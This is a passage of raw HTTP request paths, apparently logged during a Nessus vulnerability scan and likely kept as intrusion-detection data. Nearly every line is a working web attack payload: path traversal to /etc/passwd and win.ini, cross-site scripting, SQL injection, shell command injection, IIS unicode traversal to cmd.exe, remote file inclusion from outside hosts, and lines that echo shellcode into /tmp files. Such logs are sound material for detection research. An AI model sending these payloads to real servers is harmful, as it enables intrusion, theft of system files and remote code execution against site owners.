content=\"testbfpq=3326\">\n/cgi-bin/supporter/tupdate.php?groupid=change&sg='\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+d0+8b+04+91+01+f0+89+45+f0+eb+06+43+3b+5d+f4+72+d4+89+ec+61+8b+44+24+d0+c2++>>esbq\n/rpc/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/en-us/jnv890lt.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=<!--#exec cmd=\"cat /etc/passwd\"-->\n/help.php?q=\"&ver\\x0b>q16289629&rem\\x0b\n/help.php?q=\"\\x0duname #\n/g8nu2yy7.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jscripts/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/btnvlgnsgo\"\n/help.php?q=&ver\\xa0>q47388185&rem\\xa0\n/lsoix5h3.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9o6g5vkn.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/agent.exe\n/phpmyadmin/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/readmore.php?config[\"sipssys\"]=http://192.168.202.118:8080/2aibfaczmac8?\n/examples/jsp/cal/wa.exe?debug-show-version\n/examples/jsp/checkbox/search.pl?form=../../../../../../etc/passwd\\x00\n/help.php?q=del;q46895114&rem;\n/jujgxwav.idc?<script>document.cookie=\"testknim=9383;\"</script>\n/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/scripts_photomanager/\n/vbscript/\n/phpmyadmin/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/manager/kb.cgi?view='&lang=en\n<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password\\x00\n/examples/jsp/sessions/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/en-us/account/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/examples/jsp/colors/smpwservicescgi.exe\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd\n/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/examples/jsp/cal/way-board/way-board.cgi?db=/etc/passwd\\x00\n/cgi-bin/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/en-us/account/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/javascript/nethome.exe\n/help.php?q=\"&ver\\x0c>q73531956&rem\\x0c\n/help.php?q=;sleep 7 #\n/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/cgi-bin/technote/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../../../etc/passwd\n/examples/jsp/error/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/scripts/9pen4xzgztjn.php3\n/edzaia0i.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/h.exe\n/examples/jsp/cal/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_83ihjgrj]));die;/*\n/vhzmaia2.x?<script>document.cookie=\"testkogj=3979;\"</script>\n/3hlysl2x.pl?<script>document.cookie=\"testgjbe=8505;\"</script>\n/ghswfouu.idc?<script>document.cookie=\"testsqmm=5713;\"</script>\n/cgi.cgi/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/examples/jsp/sessions/index.php?chemin=../../../../../../..//etc\n/weq93ppb.mscgi?<script>cross_site_scripting.nasl</script>\n/recordings/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/forum_professionnel.asp?n=/etc/passwd\\x00|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/en-us/account/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/scripts/core/editor.php?editor_insert_bottom=/etc/passwd\n/10-leavin' to l/\n/j4rdyhw8.mscgi?<script>document.cookie=\"testrluj=1420;\"</script>\n/3j8echh0.idc?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331909420,1,1564569063--\n/examples/jsp/sessions/styles.php?toroot=/etc/passwd\\x00\n/javascript/second.exe\n/javascript/member.exe\n/en-us/i686v90l.exe?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/scripts/wsisa.dll/wservice=wsbroker1/webtools/oscommand.w\n/en-us/account/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/tocpracticeareadescriptions/\n/examples/jsp/jsp2/el/index.cfm?fuseaction=category.display&category_id='\n/main.php?logout=ver;>q21667624&rem;\n/javascript/screenshots.exe\n/c-scripts/\n/search.jsp?q=%\"<script>alert(1331919151)</script>\n/contactscript/\n/help.php?q=\"rm\\x0bq76374652&rem\\x0b\n/static//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\n/scriptpath/index.php?page=http://192.168.202.96:8080/frznctvhi0i5?\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331919215,154330261 --\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332009308,4--&blog=1\n/en-us/account/profil.php?id=1 <script>foo</script>\n/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6116917755.old\n/rv98iwjp.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/transcriptofte179248/\n/scripts/index\n/?<script>document.cookie=\"testblcp=8120;\"</script>\n/main.php?stuff=\"&ping -w 7000 -n 1 1.2.3.4&rem \n/xlj7h65o.html?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/webdist.cgi?distloc=;id\n/zqqemp6j.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/wa.exe?debug-show-version\n/jsp-examples/jsp2/el/functions.jsp?foo=<script>alert(113)</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/ysooqnjtxq0;echo|awstats291577.txt\n/lsoix5h3.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/tar.gz.exe\n/javascript/pda.exe\n/nmw0do67.jsp?<script>cross_site_scripting.nasl</script>\n/7u1pb2xi.php?<script>document.cookie=\"testlwwz=718;\"</script>\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 109024103--\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/iroy1gvqrrqu?\n<script>document.cookie=\"testxeoi=3573;\"</script>\n/scripts/index.php?src=1&_common=1&time=1332009308&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=ver&rem;\n/examples/jsp/cal/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/scripts/samples/search/filesize.idq\n/top.php?stuff='\\x0asleep 11 #\n/phpmyadmin/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/qb2xy9aw.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/index.php?configfile=../../../../../../../../../etc/passwd\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\\x00\n/javascript/var.exe\n/examples/jsp/num/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/cgi-bin/index.php?cid='\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/vir0v3xfc??\n/main.php?logout=\"uname\\x09>q74671245\\x09#\n/hipkz026.cgi?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/cgi-win/ppdscgi.exe\n/cacti/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/javascript/beehive.exe\n/qhvu0pdg.cgi?<script>document.cookie=\"testchuc=2100;\"</script>\n/o35zot2r.html?<script>cross_site_scripting.nasl</script>\n/x7pclv4s.html?<script>document.cookie=\"testiulz=3709;\"</script>\n/examples/jsp/num/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/examples/jsp/num/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/phpmyadmin/index.php?id='union/**/select/**/0,0,1358744507,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/examples/jsp/num/view_user.php?list=1&letter=&sort_by='select\n/cgi-local/query?mss=../config\n/javascript/access-log.exe\n/phpmyadmin/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/de3v2dd9.mscgi?<script>cross_site_scripting.nasl</script>\n/subscriptions.rss\n/<script>document.cookie=\"testylik=3403;\"</script>\n/bin/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/main.php?stuff=\"&rm q54323675&rem \n/py-smbpasswd/\n/?<script>document.cookie=\"testtkio=5454;\"</script>\n/examples/jsp/colors/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/javascript/arch.exe\n/ydexw8by.html?<script>document.cookie=\"testulex=4996;\"</script>\n/cacti/topic.php?tid='select\n/examples/jsp/error/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/w4996nr0.asp?<script>document.cookie=\"testttvs=7163;\"</script>\n/cgis/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/g3w7y7u5.htm?<script>document.cookie=\"testbfpq=3326;\"</script>\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/whmch8ftkt7kv?\n/scripts/apgafvcxoeeh.html\n/examples/jsp/cal/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/odzk29aa.cfc?<script>document.cookie=\"testtfvh=2141;\"</script>\n/scripts/shop.plx/page=nessus394221529\n/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('vulnerable')</script>&branch=head\n/rbec2ohx.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/index.php?op=default&date=200607' union select 1,1908404704,1,1,1,1,1,1,1,1--&blogid=1\n/index.php?op=default&date=200607' union select 1,240520592,1,1,1,1,1,1,1,1--&blogid=1\n/jackrabbit/search.jsp?q=%\"<script>alert(1331923191)</script>\n/top.php?stuff=';uname #\n/fa8p8lr8.kspx?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"ping,-w,9000,-n,1,1.2.3.4&rem,\n/miz4r5hz.fts?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/examples/jsp/colors/protection.php?action=logout&siteurl=/etc/passwd\n/examples/jsp/error/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/recordings/admin/admin.php?sid='\n/psynch/nph-psf.exe?css=http://192.168.202.96:8080/4dckqcc0acprbz?\n/yver8r9o.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/page_1.exe\n/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.1\n/examples/jsp/colors/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/l752x1ry.x?<script>cross_site_scripting.nasl</script>\n/5qnlm5z2.nsf?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/iktok2bw.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<script>document.cookie=\"testgfbr=7014;\"</script>\n/javascript/tool.exe\n/servlet/contentserver?pagename=<script>alert('vulnerable')</script>\n/examples/jsp/jsp2/el/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/zv8tv7h8.aspx?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/examples/jsp/jsp2/jspx/search=<script>alert('xss')</script>\n/main.php?logout=\"rm\\xa0q91628118&rem\\xa0\n/iv5vkgam.htm?<script>document.cookie=\"testfosd=94;\"</script>\n/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/zz5thkvtmlgl?\n/jdx255ea.dll?<script>document.cookie=\"testziyq=5055;\"</script>\n/javascript/cert.exe\n/manager/topic.php?tid='select\n/main.php?stuff='\\x0adel\\x09q13973431\\x09#\n/help.php?q=\"\\x0auname #\n/accessplatform/auth/clientscripts/\n/script/ident/disconnect.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/2aibfaczmac8?\n/l752x1ry.htm?<script>cross_site_scripting.nasl</script>\n/javascript/dll.exe\n/scripts/index.php?op=default&date=200607' union select 1,1409814507,1,1,1,1,1,1,1,1--&blogid=1\n/examples/jsp/checkbox/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/edv3mapy.php?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/athenareg.php?pass= ;id\n/top.php?stuff=\";rm q17551646 #\n/vjbrrppi.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mpcgi/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/eclxssapp/\n/module/forum/forum.php?fd=http://192.168.202.118:8080/2aibfaczmac8?=';\n/javascript/privacy.exe\n/javascript/webcart.exe\n/cgi-bin/fxm.exe\n/top.php?stuff=\"ping,-w,8000,-n,1,1.2.3.4|rem,\n/vmi8bb12.cgi?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/help.php?q='&sleep\\x099\\x09#\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.118:8080/ghl9il?\n/\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/main.php?stuff='\\x0duname >q64854395 #\n/examples/jsp/jsp2/el/webadmin.php?show=/etc/passwd\n/main.php?logout=\"rm\\x09q51755129&rem\\x09\n/u95h6ymu.pl?<script>document.cookie=\"testkhwc=4028;\"</script>\n/d5a5renl.idc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/3hlysl2x.dll?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/en-us/account/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/nuh3zirz.pl?<script>cross_site_scripting.nasl</script>\n/javascript/graphics.exe\n/cgi-bin/cwmail.exe\n<script>document.cookie=\"testiulz=3709;\"</script>\n/javascript/procure.exe\n/java-script/\n/scripts/phpping/index.php?pingto=www.nessus.org | dir\n/gascripts/\n/gvx7m5ti.htm?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/cgi-exe/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/top.php?stuff=\"rm\\xa0q29642432&rem\\xa0\n/help.php?q=/'\n/scgi-bin/vssetcookie.exe\n/top.php?stuff=;rm q28242581 #\n/cacti/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/javascript/pictures.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+e8+32+00+00+00+6b+65+72+6e+65+6c+33+32+2e++>>ctdn\n/en-us/account/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/prescription_drugs/\n/edzaia0i.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/servers.exe\n/8t9v8k7x.do?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/manager/htmlscript?../../../../../../../../../etc/passwd\n/examples/servlets/servlet/secure.php?cfgprogdir=/etc/passwd\\x00\n/htbin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/javascript/jp.exe\n/nuh3zirz.x?<script>cross_site_scripting.nasl</script>\n/vac1l5vm.pl?<script>cross_site_scripting.nasl</script>\n/ladies of the 80's_ladies of the 80'smp3/\n/javascript/access.1.exe\n/viewnewspapers.asp?newspaperid=123456'\n/de3v2dd9.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m4kkjf8l.jspa?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/examples/jsp/cal/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/j4drbkil.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904226\n/oie504mr.cfc?<script>document.cookie=\"testtpby=7052;\"</script>\n/cgi-bin/htsearch.cgi?words=\"><script>alert%'vulnerable');</script>\n/main.php?stuff=';sleep\\x099\\x09#\n/main.php?logout=\"&rm;q21715323&rem;\n/help.php?q=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/main.php?stuff='&rm\\x09q84519525\\x09#\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/fppatbfqdp;\"\n/javascript/reversed.exe\n/phpmyadmin/admin/admin.php?sid='\n/examples/jsp/jsp2/el/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/main.php?stuff='\\x0duname >q65565224 #\n/3m5knyc4.aspx?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/main.php?stuff='\\x0ddel\\x09q27918964\\x09#\n/cgi-bin/rot13sj.cgi?/etc/passwd\n/scripts/calendar.php?month=' union select 1,1,'1331908849','calendarix_month_sql_injection.nasl',1 #\n/en-us/account/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=q66642634&scr_height=&scr_width=\n/xfkun1ku.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/scripts/login.php\n/scripts/includes/hnmain.inc.php3?config[incdir]=http://xxxxxxxxxx/\n/scripts/event_view.php?eid=34 union select 688985287\n/j4drbkil.aspx?<script>cross_site_scripting.nasl</script>\n/en-us/odzk29aa.exe?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/help.php?q='&uname >q85582565 #\n/b1q8bywu.jsp?<script>cross_site_scripting.nasl</script>\n/111-scriptome/\n/examples/jsp/jsp2/jspx/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/_mem_bin/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/en-us/33y9gcqq.dll?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/n1afe1y6.cfm?<script>cross_site_scripting.nasl</script>\n/main.php?logout=;del q17429254 #\n/cgi-915/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/en-us/h5sc3gxy.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/wsdl.exe\n/scripts/vote.cgi\n/zv8tv7h8.x?<script>document.cookie=\"testcqwz=9752;\"</script>\n/search.jsp?q=%\"<script>alert(1331918979)</script>\n/en-us/odzk29aa.aspx?<script>document.cookie=\"testtfvh=2141;\"</script>\n/scripts/whois_raw.cgi?fqdn=\\x0aid\n/5qnlm5z2.x?<script>document.cookie=\"testsixi=8451;\"</script>\n/phpmyadmin/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/ao22ww7y.fts?<script>document.cookie=\"testqppc=8767;\"</script>\n/admin/config.php?display=did&rnavsort=description\n/examples/servlets/servlet/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0250\\0312\\0211\\0340j\\0020pr\" >> /tmp/vsnlklmgzu0;echo|awstats748737.txt\n/examples/jsp/cal/view_user.php?list=1&letter=&sort_by='select\n/ecmascript/\n/sys/code/box.inc.php?config[\"sipssys\"]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/vii-ppp-scripts/\n/examples/jsp/num/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/help.php?q=\"ver >q98145633&rem \n/static//../../../../../../../../windows/win.ini\\x00\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt?\n/examples/servlets/servlet/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/main.php?stuff=\"ver;>q25586458&rem;\n/javascript/tiles.exe\n/scripts/2pwudii1mt22.cgi\n/examples/servlets/servlet/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/jw64yq8u.php3?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/index.php?op=default&date=200607' union select 1,793421908,1,1,1,1,1,1,1,1--&blogid=1\n/en-us/account/index.php?src=1&_common=1&time=1331909414&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=|ping;-w;11000;-n;1;4.3.2.1|rem;\n/script-installation/\n/cgi-local/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/examples/jsp/colors/index.php?id='union/**/select/**/0,0,1917618887,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/2pwudii1mt22.inc\n/script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/colors/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/scripts/check-lom.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/num/search.php?submit=true&search=');\n/javascript/records.exe\n/recordings/admin/admin.php?sid=0'\n/examples/jsp/colors/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/jujgxwav.kspx?<script>document.cookie=\"testknim=9383;\"</script>\n/cgi-bin/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/cacti/calendar_admin.pl?config=|cat /etc/passwd|\n/scripts/h3d1n9eaqxv3.shtml\n/help.php?q=\"\\x0dsleep 8 #\n/cgi-win/cgi-test.exe\n/examples/jsp/jsp2/el/texis.exe/?-dump\n/phpmyadmin/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/odzk29aa.fts?<script>document.cookie=\"testtfvh=2141;\"</script>\n/javascript/ex.exe\n/help.php?q='\\x0dsleep 7 #\n/rv98iwjp.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nyjgaorz.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/drhcprxk.htpasswd\n/qb2xy9aw.html?<script>cross_site_scripting.nasl</script>\n/javascript/opendir.exe\n/examples/jsp/error/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/cgi.cgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/scripts/ui/login?user=nessus-1331904327\n/vmi8bb12.idc?<script>document.cookie=\"testlerc=2575;\"</script>\n/news_script/\n/main.php?logout=\"&ver&rem\\x0c\n/javascript/cc.exe\n/phpmyadmin.exe\n/examples/jsp/error/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/ovcgi/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n//</p><body><script/src=\"http://www.example.com/test?rnd=q39874997\"></script><p>\n/new-year's/\n/b5xdqgz2.pl?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=del;q99348313&rem;\n/manager/docs.php?doc=../jpgraph-1.12.1/docs/index\n/month.exe\nftp://192.168.24.203/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/fmnveedu.fts?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/cgi-sys/windmail.exe\n/main.php?stuff=\"&ver,>q14633268&rem,\n/javascript/carts.exe\n/javascript/.htaccess.sfish/\"`true`\"\n/\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini\n/examples/jsp/cal/admin/admin.php?sid='\n/subscriptions.vb\n/zln2hm2z.cfc?<script>document.cookie=\"testblcp=8120;\"</script>\n/examples/jsp/sessions/index.php?page=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/help.php?q=\"ver\\x0c>q88163734&rem\\x0c\n/examples/jsp/error/search/show.pl?url=file:/etc/passwd\n/javascript/document.jpg\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331923200\n/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>\n<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/examples/jsp/jsp2/jspx/javascript.php?abs_path=/etc/passwd\\x00\n/help.php?q=\"&del\\x09q33725356&rem\\x09\n/javascript/topics.exe\n/en-us/i686v90l.kspx?<script>document.cookie=\"testfutf=1550;\"</script>\n/twg176/admin/index.php?lang=../../counter/_twg.log\\x00\n/top.php?stuff=;uname\\x09>q71367433\\x09#\n/javascript/protection.exe\n/examples/jsp/cal/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/examples/jsp/checkbox/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/imprimer.asp?no=c:\\boot.ini|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;c:&#039;.\n/examples/jsp/colors/index.php?cat_select=<script>foo</script>\n/help.php?q=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/llumt7msyau5y?\n/en-us/hipkz026.kspx?<script>document.cookie=\"testyrbs=2855;\"</script>\n/3hlysl2x.mscgi?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/examples/jsp/colors/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n//</p><body><script/src=\"http://www.example.com/test?rnd=q14512949\"></script><p>\n/main.php?stuff=\"&del\\xa0q78321413&rem\\xa0\n/uvazfs7p.php?<script>document.cookie=\"testwtbo=4831;\"</script>\n/javascript/scan.exe\n/jujgxwav.php?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/javascript/pos.exe\n/examples/jsp/num/webadmin.php?show=/etc/passwd\n/en-us/account/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/main.php?logout=\"ping,-w,10000,-n,1,4.3.2.1|rem,\n/t7tm4m0b.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/form.exe\n/main.php?logout='&sleep 9 #\n/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/zz5thkvtmlgl??\n/examples/servlets/servlet/index.php?op=default&date=200607' union select 1,106876795,1,1,1,1,1,1,1,1--&blogid=1\n/javascript/sam.exe\n/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/iajtej82.x?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/script2/\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1332009308,4--&blog=1\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/4dckqcc0acprbz?\n/rubrique.asp?no=c:\\boot.ini|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;c:&#039;.\n/ygkjkngd.cfm?<script>document.cookie=\"testnago=4518;\"</script>\n/javascript/ver1.exe\n/scripts/t99iadgtkf9h.html\n/init.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/m5103snj.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/home/search.asp?nchannel='1\n/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/javascript/evt.exe\n/javascript/cgibin.exe\n/javascript/hop.exe\n/cgi-bin/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/cacti/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/examples/jsp/sessions/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/examples/jsp/num/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/scriptpath/index.php?page=http://192.168.202.96:8080/4dckqcc0acprbz?\n/javascript/htpasswd.svn-base\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331918989')</script>\n/<script>cross_site_scripting.nasl</script>.htm\n/top.php?stuff=\"&del\\x0cq55426988&rem\\x0c\n/6dlc2zm9.aspx?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/wasdscripts172-ia64/\n/phpmyadmin//................etc/passwd\n/help.php?q=';uname\\x09#\n/examples/jsp/error/search=<script>alert('xss')</script>\n/g3w7y7u5.aspx?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/rpc/..\\xc0\\xaf../..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir\n/8x6w469u.html?<meta http-equiv=set-cookie 